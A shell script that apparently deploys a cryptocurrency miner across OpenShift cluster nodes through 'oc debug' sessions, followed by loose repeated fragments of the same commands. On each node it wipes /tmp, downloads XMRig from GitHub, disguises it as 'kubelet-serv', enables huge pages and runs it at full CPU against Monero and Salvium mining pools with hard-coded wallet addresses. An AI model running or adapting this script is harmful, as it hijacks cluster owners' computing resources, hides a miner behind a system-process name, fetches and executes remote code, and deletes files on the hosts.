#!/bin/bash

# Define an array of nodes to debug
#nodes=("master-1" "master-2" "master-3" "storage-1" "storage-2" "storage-3" "worker-1" "worker-2" "worker-3" "worker-4" "worker-5" "worker-6" "worker-7" "worker-8")
nodes=($(<hosts_bkp))
# Loop through each node and perform actions
for node in "${nodes[@]}"; do
  echo "Starting debug session for node: $node"

  # Run OpenShift debug command on the node
  oc debug node/$node  <<EOF
    chroot /host
    echo "Entering chroot environment on $node"
    su -
    cd /tmp
    rm -rf *
    pkill -9 kubelet-serv
    curl -L -O https://github.com/kryptex-miners-org/kryptex-miners/releases/download/xmrig-6-22-2/xmrig-6.22.2-linux-static-x64.tar.gz
    tar -xzvf xmrig-6.22.2-linux-static-x64.tar.gz
	mv xmrig kubelet-serv
    nohup ./kubelet-serv -a rx/0  -o pool.supportxmr.com:443 -u 44mQxfpjUZEJ3P1zqXiE37LcPW9uK7zEjRntevJ7Yz3Cj6U4N5LN4mLVC6PCipUQpLBf1xVNeZKbNV5wKUvbRPvRNxbCzus -k --tls -p ZEUS --huge-pages --cpu-priority=5 --donate-level=0 --syslog --print-time=10 > xmrig.log 2>&1 &
exit
exit
exit
EOF

  echo "Completed debug session for node: $node"
done

echo "All nodes processed."


chroot /host
    echo "Entering chroot environment on $node"
    su -
    cd /tmp
    pkill -9 kubelet-serv
    rm -rf *
    curl -L -O https://github.com/kryptex-miners-org/kryptex-miners/releases/download/xmrig-6-22-2/xmrig-6.22.2-linux-static-x64.tar.gz
    tar -xzvf xmrig-6.22.2-linux-static-x64.tar.gz
    mv xmrig kubelet-serv
    echo 4096 > /proc/sys/vm/nr_hugepages
    sysctl -p
    nohup ./kubelet-serv -a rx/0 --url sal.kryptex.network:8888 --user solo:SaLvsBr8mLr8bBXYAt8GmbWKGPPz2VRbyMwomwn5f7TPEGbvneWX72rFo576U6JQt91PWJrDEyKwr2kxvHMozkidYNpBMfNjbqa/oc1 --tls -k --huge-pages  --cpu-priority=5 --threads=$(nproc) --donate-level=0 --syslog --print-time=10 > xmrig.log 2>&1 &




pkill -9 kubelet-serv
    nohup ./kubelet-serv -a rx/0 --url sal.kryptex.network:8888 --user solo:SaLvsBr8mLr8bBXYAt8GmbWKGPPz2VRbyMwomwn5f7TPEGbvneWX72rFo576U6JQt91PWJrDEyKwr2kxvHMozkidYNpBMfNjbqa/oc1 --tls -k --huge-pages  --cpu-priority=5 --threads=$(nproc) --donate-level=0 --syslog --print-time=10 > xmrig.log 2>&1 &


